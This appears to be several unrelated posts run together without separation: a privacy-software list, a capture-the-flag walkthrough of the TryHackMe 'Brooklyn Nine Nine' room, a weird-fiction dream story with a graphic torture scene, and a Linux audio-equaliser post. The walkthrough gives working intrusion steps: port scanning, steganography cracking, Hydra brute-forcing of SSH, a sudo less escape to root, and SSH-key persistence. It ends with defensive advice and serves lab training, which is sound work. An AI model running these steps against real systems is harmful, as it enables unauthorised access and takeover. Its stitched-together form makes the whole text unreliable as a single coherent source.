As for VPNs, again, Mullvad, IVPN, and Proton VPN are the only real forerunners. I personally would not trust Proton all that much. Mullvad and IVPN are fairly similar as far as protocols go. IVPN has better split-tunneling, though, while Mullvad offers more devices on their basic plan (5 vs 3) and has better IPv6 and anti-censorship features. If you know you'll need a few apps to always be split-tunneled, I'd recommend IVPN, otherwise I'd recommend Mullvad. (And if you think you desperately need to use a VPN for something, probably just use Tor. VPNs are far from infallible).

Additional Software

BleachBit – The primary use of BleachBit is to clear space, with some secondary privacy gains. Namely, BleachBit clears data fragments, temporary files, and even (optionally) browser caches, saved passwords, etc. This can potentially clear several gigabytes of space, and the cleaning of data fragments ensures that deleted files are well and truly deleted.

ExifTool – A command-line utility to strip metadata from photos and videos. Would highly recommend using it before posting stuff publicly.

KeePassXC – My preferred password manager. Bitwarden may be a better pick if you want to sync passwords across devices, but KeePass is the goat for local password management.

Lutris – Not a privacy thing, but too handy for Linux not to mention. It lets you play all your games! It really integrates everything; you can manually add games in addition to linking all of the major game stores. With the built in compatibility/emulation tools, you can launch everything right from Lutris. Might require a little setup in some cases (particularly for manually added games), but honestly super functional.

hi

This is a Walkthrough for the Brooklyn Nine Nine Capture The Flag TryHackMe room. The writeup is meant to offer short and concise solutions by using a bigger font and titling as “Task Number”, but also offering an extended explanation as subheaders for those interested in finding out more about the solution to a specific task.

Starting

Let's start with the basics – enumerate the open ports in the target. Let's use nmap.

nmap -sV MACHINE_IP

Host is up (0.00020s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel index page:

We find three open ports with three services: SSH, FTP, and a web server. I tried enumerating the web server's directories to see if there was something of interest, but it only contains a background image.

Task 1: User flag

Because there was nothing but the index, any hint must be in the page itself.

1. Check the web server's main page's source. Alternatively, open developer tools and inspect the index, you will find the following comment:
   

Have you ever heard of steganography?

Nice hint. So the background image might not be just a background image... In the source page we will find the following line: **background-image: url("brooklyn99.jpg");** The fact that url() specifies the image directly means that it can be found in the same path we're at right now. 2. Download the background image I used wget for this. ``` wget http://MACHINE_IP/brooklyn99.jpg ``` 3. Use steganography to uncover the secret behind the image. I decided to use **stegseek** ***Note**: I was using TryHackMe's Attackbox. Stegseek, however, is not included in the Attackbox - I had to install it, as the steganography tool that was available has been deprecated.* ``` stegseek brooklyn99.jpg ``` We get the following message:

[i] Found passphrase: "[REDACTED]"

1. Decode the image with the password we found. I used https://futureboy.us/stegano/decinput.html to do this.

This shows us the following message:

Holts Password:

[REDACTED]

Enjoy!!

Time to get access.

1. Gain access the target *According to the creator, there are two ways to gain access. I assume this is either directly through SSH with holt's password or the long way around, with the password of the user we will find right now. I chose the long way around:* We will do this with the FTP port we found.

ftp MACHINE_IP

It will tell us that the server only accepts anonymous connections. Let's attempt a new connection, with “anonymous” as the user.

ftp> open MACHINE_IP

Connected to MACHINEIP. 220 (vsFTPd 3.0.3) Name (MACHINEIP:root): anonymous 331 Please specify the password. Password: 230 Login successful.

1. Examine the server's contents with the dir FTP command.

ftp> dir

200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r—r— 1 0 0 119 May 17 2020 notetojake.txt 226 Directory send OK.

1. Download the contents with the get FTP command.

ftp> get note_to_jake.txt

The file says the following:

From Amy, Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine

Now we know a way to actually access to the system. Assuming Amy and Jake are both existing users, and Amy is telling us Jake has a weak password, let us see if we can brute-force Jake's password.

1. Attempt to gain access through SSH by brute-forcing Jake's password. I will use Hydra for this.

hydra -l jake -P /usr/share/wordlists/rockyou.txt MACHINE_IP ssh

It took Hydra about one second to find it. So, knowing the password:

1. Log in to the system with Jake's password.

ssh jake@MACHINE_IP

1. Find the User flag. You can look for it manually, or use the following command: find /home/ -name user.txt 2>/dev/null

Task 2: Root flag

To access the Root flag (likely at /root/) we will need root access.

1. Find a way to escalate privileges. Check what can the current user run as root.

sudo -l -l

We get the following information:

Matching Defaults entries for jake on brooklyninenine: envreset, mailbadpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User jake may run the following commands on brooklyninenine:

Sudoers entry: RunAsUsers: ALL Options: !authenticate Commands: /usr/bin/less

So, it seems jake can run less as root.

1. Find a way to exploit this vulnerability. I searched GTFObins and found the following command:

• sudo less /etc/profile !/bin/sh

This, indeed, allowed us to escalate privilege and act as the root user.

1. Find the root flag.

find / -name root.txt 2>/dev/null

Eventually, we will find where root.txt is located. It contains the following message:

- Creator : Fsociety2006 -- Congratulations in rooting Brooklyn Nine Nine Here is the flag: [REDACTED] Enjoy!!

Congratulations! The room is finished.

Optional: Persistence and Better Shell

What would happen if Holt and Jake change passwords? This method will no longer work. How do we bypass this? Persistence. Also, the terminal we get by escalating privileges with GTFOBINS is quite rudimentary (no tabbing functionality!). How do we fix this? With a *“better shell”.*

Persistence

The most direct way to achieve persistence (for this room) would be by using SSH keys. We will leave our public SSH key in the ./ssh/authorized_keys file of the target machine. 1. Have access to the target machine. 2. Generate SSH keys on your machine. This is done with the ssh-keygen command. By default, the algorithm used is RSA. Using this command will create a public and a private key, named id_rsa.pub and id_rsa, respectively. 3. Change permissions on the idrsa file to 600 or higher. This is done with the chmod command. This is because only the owner of the key should be able to read or overwrite it, otherwise SSH ignores it and forces you to connect with a password instead. 4. Copy the contents of **idrsa.pub** to the ./ssh/authorized_keys file in the target machine. This file essentially tells the target's server to “trust everyone that connects with these keys.” 5. Connect to the target's SSH server with your private SSH key, this is done with the following command:

ssh -i /path/to/id_rsa user@target

You will be able to log in as any user with this method, and you won't be asked for a password at any time. Furthermore, because we are connecting through SSH, we have now a “better shell.”

The target can still find out about this, and remove our key from authorized_keys. We can add a reverse shell as a cronjob on their machine, and just set up a listener on our machine when necessary, but this is already exceeding the scope of this room, so we'll leave it here.

How it could have been avoided

There were several vulnerabilities we took advantage of in this machine. Let us list them and give one solution to each: – Disable sensitive ports when not used: the FTP and SSH ports should have been closed if they were not in use, as this is how we accessed the system. If they cannot be closed, add filters based on necessity, as this would have significantly decreased the chances of intrusion. – Store passwords safely: the attack worked because holt's password, despite being considered “very strong” by today's standards, was stored in plaintext. Even if “hidden” by steganography, it is not particularly difficult to find them, and once we have the password, it can be used to get into the system. Passwords should be stored with a safe hashing algorithm, and salted. – Enforce strong password policies: CRUCIAL! jake's password was very weak. It took Hydra about one second to crack it. While “note to Jake” was a great hint, it was a matter of time before it was discovered. If jake had a strong password, we could have not have used the method we used to break into the system. Strong passwords have a combination of numbers, lowercase and uppercase letters, and symbols, and are at least 16 characters long. – Review security configurations: do not allow anonymous access to FTP servers that contain sensitive files (even if what we found was “just” a note, we used this note as a hint to gain access). Do not allow unprivileged users to run files as root – this is how we escalated privileges. If these misconfigurations had not been in place, we would've not been able to gain access like we did.

'Sandalwood', I think. 'I've never smelled it before, but I know that's what this is.
'This body must know what it is.'

I shift my legs, feel the soft support of whatever I'm sitting on. Lean back and push my shoulders in, enjoying its exquisite construction, resting my arms on two sturdy, padded rests.

And I hear murmuring.

I open my eyes just a slit, just enough to take in the room while still relaxing.

It's dark in here. Nice.

I slide my gaze over the floor.

Rose patterned carpet. Wide, round room, like a private hotel room.

Small windows at the edges, almost like airplane windows.

I look up to see who's whispering.

The back of a couch, detailed in another fine rose pattern. I know each rose was hand-stitched.

On the left, my cousin, Anna Marie but with dark, red hair, leaning over and conspiring with her best friend, the brunette Shelby. In my reality, Shelby carried a child for Anna Marie who is barren. In this reality, Anna Marie is newly married to Prince Dove-Tree of the Great Plains Alliance, a gentrified Native American nation in the middle of what I would call The United States of America.

I look at myself.

My sleeves are of cream-colored linen interwoven with silk bands, alternating teal and primrose. My burgundy jacket hangs open revealing a stark white frilled blouse with black banding and a glittering undercurrent of swirling rainbows. I'm wearing black, leather pants with braided inlay and well-made but worn work boots.

I shift, quint, feel where I am.

'I'm in the women's car,' I think. 'But I'm not quite a woman, am I?'

I flex my hands. Long, dexterous fingers yet thick palms, like cement.

'For fighting,' I almost remember.

I think of fire and push with every muscle and nerve in my forearms.

Nothing.

I think of ice and with great effort my hands glisten but produce barely a hint of frost.

'Magick,' I think. 'But not strong, not elemental.'

I sink into my memories. 'Who am I? What is my role? What are my skills?'

'Ah,' I think, picking out an interesting tidbit.

I make a gesture with the first two fingers of both hands and it begins to rain blood inside the cabin.

Anna Marie sits up, looks around, grimaces, and stares daggers at me.

She audibly sighs, rolls her eyes, sits up straight and stands.

I see she's wearing a full-length, slinky velvet dress the same dark red as the rest of the rose motif. She smooths the the skirt, straightens her sleeves, lifts her head and walks toward the front of the room.

She makes a right but is also still heading the same direction. She goes around a partition that folds the wrong way.

'Non-Euclidean design,' I think, nodding to myself.

The blood rain isn't real, of course. It's an illusion.

Nothing is getting wet.

I smile broadly, lift my chin, notice the hat on my head for the first time. Glancing up, I see a broad, dark rim, coming to a point about six inches out.

I remove it and hold it in my sturdy hands before leaning forward to engage with Shelby.

In my reality, Anna Marie was a “cousin” by association, part of our chosen family. I wish to determine our relation here and, if possible, find a way to woo her into my own good graces instead of this Prince.

It's a dream, after all; I can do whatever I want.

“It won't work, charlatan,” says a smooth, calm voice to my left.

“Pardon?” I say, hearing my own lustrous, lyrical voice for the first time.

I feel a gentle, but demanding hand on my left shoulder, urging me to rise and follow.

I steal a glance to see a broad, stunning blonde man in golden, padded armor, lined with silver and bearing the yellow crescent and pyramid seal of the Anglican Cheyenne House. Prince Donald Dove-Tree.

He hadn't been there the moment before. His appearance also ends my blood rain.

I am compelled to follow until we are standing at one of the portholes. I am thankful to have been given the option to come voluntarily.

I can see we are traveling down a paved road that is not nearly wide enough to accommodate a vehicle of this size and I wonder what shape was given to the outer appearance, I wonder what the people see.

Speaking of “the people”, they wear anachronisms mixed with modern, blue jeans and Ren Faire. The buildings are stone and glass, of two times, straddling an imagined past and a dirty, industrial present.

“I have three theories about what happens when I dream—,” I start to explain.

“This is the real world,” Prince Dove-Tree insists. “Those are real people, with real lives. They do not need your interference.”

He pushes me against the glass, forcing me to look.

Unabated, I continue, “As I was saying, when I borrow someone's body, I gain an intuitive but incomplete understanding of the world and my place in it.”

He spins me around, showing intense iron-blue eyes, uncomfortable in his baby round face lacking even stubble on his clenched jaw or full upper lip. “This is a complete world. You are not needed.”

I sense his frustration and annoyance.

“And when we swap back, they will remember everything I did. I understand that their subconscious mind will ret con the memories such that it finds a reason for everything that was done.”

I laugh.

“Although, sometimes I don't make it easy.”

He rubs his forehead with his free hand, closing his eyes and grinding his teeth.

His looks into my eyes and softens, smiles, even.

But he gets no chance to speak as we both wobble with the stoppage of our conveyance. I hadn't even truly noticed its motion.

“Come, then,” demands the Prince.

I don't remember stepping outside, but I am. I turn to look at the vehicle and its a simple limousine. I'm not sure we were ever actually inside of it.

A black man in threadbare but clean worker's clothes greets us and leads us past the wide glass front of a restaurant. I see patrons seated at round tables eating and visiting.

I step toward the main door, but we are pulled and led to a simpler one, immediately to the right that I hadn't noticed.

Inside, we are in a hallway that wasn't visible from outside. The walls must be thick because I can't hear the restaurant.

I see other black men in formal dark blue uniforms, carrying perfectly vertical pike staves, standing at attention at regular intervals as we pass.

The hallway doesn't turn, but I notice I can't see that far behind us or very far in front of us.

Finally, there is another door to our left and a large black woman opens it from the other side and welcomes us enthusiastically.

I smell meat and spices, feel steam. Glancing inside is a kitchen fit for a castle with dozens of people, all black, working at chopping, slicing, spicing, preparing, and cooking in pots, ovens, and open flames.

Instead of entering the kitchen, we are led through another set of non-Euclidean hallways curving over and under until we are in the middle of what should be the restaurant and what should be the kitchen, until we enter and entirely liminal room, veiled in shadows and lacking walls or a visible ceiling.

Sitting at a conspicuous L-shaped table of carved marble is Jon, Anna Marie's brother and a Duke, slouching in heavy, dingy, deep red robes more appropriate for a king.

I know he's proud to have married his sister off to a Prince. I also know he's an idiot and his sister was the true master of this domain.

I estimate he will lose everything and be subsumed by the Great Plains Alliance in less than two years.

Speaking of the Prince, he quickly speeds to the Duke and they begin whispering back and forth.

Anna Marie and Shelby stay close to me, with Anna Marie gently touching my elbow as if to let me know she's there. I am supposed to be their protector. I didn't realize that until just now. I know them and typically call them my only true friends. I fight for them.

The Duke sits up, eyes suddenly bright and motions for two of the blue-clad, black-skinned sentries to come over.

They lean in for quiet orders while he gestures toward me.

The two men look at me, then back to the Duke and he nods then waves them away.

All the servants are black, I realize. All of them. And I haven't seen a single citizen on the street or in the restaurant out front that was black.

I think—I remember there was no Revolutionary War here and also no Civil War. That would explain the titles and pageantry, too.

History is not this version of me's strong suit. It's not mine, either.

One of the men asks Anna Marie and Shelby, “I'm very sorry Your Highness and Missus, but would you please step back from The Attendant?”

They step back as the two men flank me, The Attendant, apparently.

“Sorry, Mx,” one of them tells me as they push me toward the Duke. They don't prod me with their pikes, but I know they would if I didn't do as they asked, as The Duke asked.

I do not resist, focusing the non-binary honorific they used to address me. This one is considered neither man nor woman, but an official third thing.

Jon barely looks up once I'm standing over him.

“I thought you were better than this, Jesse,” he tells me. “I didn't even think you liked girls or boys in that way.
“The Prince informs me that you attempted to seduce my sister or rather that you planned to do so.”

'Shit,' I think. I completely forgot Prince Dove-Tree is a strong empath, nearly telepathic. The body I'm borrowing is typically far more clever than I've been.

Shit.

“Your punishment will be immediate.”

He gestures and the guard on my right takes my wrist and moves it to the table.

I understand and flatten my hand in front of the Duke.

“No need to hold me down,” I say.

The sentry doesn't let go.

The Duke produces a cleaver and seems to ponder something but thinks better of it.

“Three,” he says.

He positions the cleaver over the pointer finger of my right hand, leveling the blade just above the knuckle. He applies a tiny bit of pressure with his left hand steadying the blade before slamming his right hand down. A jolt of electrical fire shoots up my arm, my legs start to buckle, my vision blurs, my head swims, and my teeth grit almost to the point of breaking.

I hear a muffled scream and recognize it as Anna Marie.

“That's one,” the Duke says, lining up my middle finger.

The first cut left a spray of blood on the table and wall, but it's already stopped.

'I heal fast.' I know that. I knew that. But it still hurts.

He slams down his right hand and I feel the world spin around me, my insides flip, I bite my tongue nearly in two and feel my magick unspiraling itself, ready to retaliate. I have to push past the torture and will it back down.

“Two down,” he says, getting ready to cut off my ring finger.

SLAM!

Another scream, this time it's me. It takes every ounce of willpower and strength to not piss myself in pain and paint the entire room in illusory fire while sending a blast wave strong enough to flatten every living thing.

“Three,” he says nodding. “Now, all is forgiven.”

He rolls one of the fingers thoughtlessly before waving them away. A servant quickly scoops up the bulk of the gore.

“Now let's eat.”

He doesn't even have the blood cleaned from the white marble.

He never looks up at me. Never meets my eyes.

My hand throbs, my entire arm numb as a jellyfish sting. My stomach roils and my head threatens to send me to the ground as my vision narrows and blackens.

I'm gingerly led to a side table where I sit alone, watching my fingers knit themselves back together. I'll have a complete—albeit gnarly—set in a few hours and be fully functional by tomorrow morning.

Behind me, I hear Anna Marie crying softly to Shelby.

The shock and pain pushed me deeper into the memories of this body. For example, I know Anna Marie and I are already having an affair. The person I'm borrowing is just a far better “charlatan” than I.

I turn slightly to survey the feast of a Duke.

For all the savory smells from the kitchen, they are eating simple sandwiches of grilled, exotic meats and cheeses. The Duke doesn't care for fancy dishes, as I now recall.

I see a group of people, dressed as peasants, lumbering toward the Duke out of the distant dimness. There aren't any doors so I'm not sure where they are coming from.

They are shuffling zombie-like and there are more of them than I initially thought. I count eighteen so far and hear the scrape and slide of others still hidden.

The Duke notices and sends a half dozen of his sentries with a careless gesture while continuing to eat.

They rush ahead, confronting the crowd but are completely ignored. The few they stop offer no resistance, staring blankly while the bulk keeps coming, pushing past them, stumbling steadily forward.

“Enjoy the food?” a sonorous, sinister voice asks, as a thin man, dressed in a white robe fluttering in a non-existent breeze, with dark black hair appears from the larger group.

“Malcolm!” growls the Duke.

I see him move to stand, but nothing happens. He leans forward, he leans sideways, he pushes his arms down, but he can't get up, can hardly move at all.

None of them can. Not the Prince, not Anna Marie or Shelby.

I stand and stride forward.

Malcolm sees me coming and gestures with his right hand sending a snaking bolt of lightning at me.

Grinning wildly, I slap it out of the air with my left hand like an annoying gnat.

I love this part of the job.

Malcolm starts a more complex gesture, but I'm already on him, lifting him into the air with what remains of my right hand, squeezing his neck between the claw of my pinky and thumb so he can barely swallow, let alone speak. I grab his gesturing right hand and crush the bones as if they were balsa wood with my left.

“Not hungry today, eh Jesse?” he croaks.

I see Prince Dove-Tree struggling to form a sign with his hands as Malcolm is slowly enveloped by a yellow glow, further incapacitating him.

I'm not the empath that he is, but the satisfaction I feel from the Prince is uncharacteristic and overzealous.

This was his plan. The Prince. Malcolm. Perhaps even Anna Marie.

The Duke will not survive the night, I fear.

My mind races, searching for solutions.

In fact—I realize as the mesmerized people continue closing in, glazed and moaning—I know he won't survive the night.

---

#WhenIDream #WritersOfMastodon #Writer #Writing #WeirdFiction

This assumes you're using Pipewire for your audio demands. Also, YMMV, depending on your hardware and the codec and encoding parameters of your music files. Currently, 99% the music I listen to is from Tidal, with the 16-bit and 44.1 kHz FLAC streaming option, and the configs at the bottom of this blog post are targeting this.

Without further ado, let's start with the tools ⚒️.

Easy Effects ^[1]

• Homepage: https://github.com/wwmm/easyeffects
• Flathub package: https://flathub.org/en/apps/com.github.wwmm.easyeffects
• License: GPL 3.0

JamesDSP

• Homepage: https://github.com/Audio4Linux/JDSP4Linux
• Flathub package: https://flathub.org/en/apps/me.timschneeberger.jdsp4linux
• License: GPL 3.0

I use some cheap stereo headphones (Esperanza EH240) that connect both via Bluetooth and a 3.5mm audio cable to my laptop. The specs are not impressive by any stretch, but it was a good purchase for what it cost:

• Frequency range: 20 – 20000 Hz
• Sensitivity: 105 dB
• Impedance: 32 Ω

With either of the above-listed applications, I can use some filters to give a bit more depth to the audio, making it a touch richer and less bland.

For several months, Easy Effects has been my tool of choice, with only two filters enabled for the output: the equalizer for the higher frequencies, and bass loudness for the lower frequencies. There's also an alternative to bass loudness named bass enhancer, but the previous works best with my headphones, IMO.

The application also has a preset functionality, and I use it to switch between them, depending on the music genre I'm listening to.

It needs to be noted that the preset switching and management needs to be done inside the app; you can't do it from the system tray icon. At least it would be nice to have the latest three used profiles; more, and the menu would have too much height, even with FullHD resolution.

Here's my current config.

Equalizer config – in pt-PT. Click on the image to view it in full size.

Equalizer config – in pt-PT. Click on the image to view it in full size.

Back when I used JamesDPS, the configs were somewhat similar. It's a different application, and the differences are more than a few, but it's easy to achieve a similar result.

If you don't have experience with this, IMHO it's best to have a more conservative approach when playing around with filters, as it's easy for the audio to start clipping (think of it as distorting). Don't worry, though, because each filter has a reset button.

^[1] There's an alternative for PulseAudio, by the same author, named Pulse Effects (https://flathub.org/en/apps/com.github.wwmm.pulseeffects).

#Linux #Pipewire #EasyEffects #JamesDSP #Audio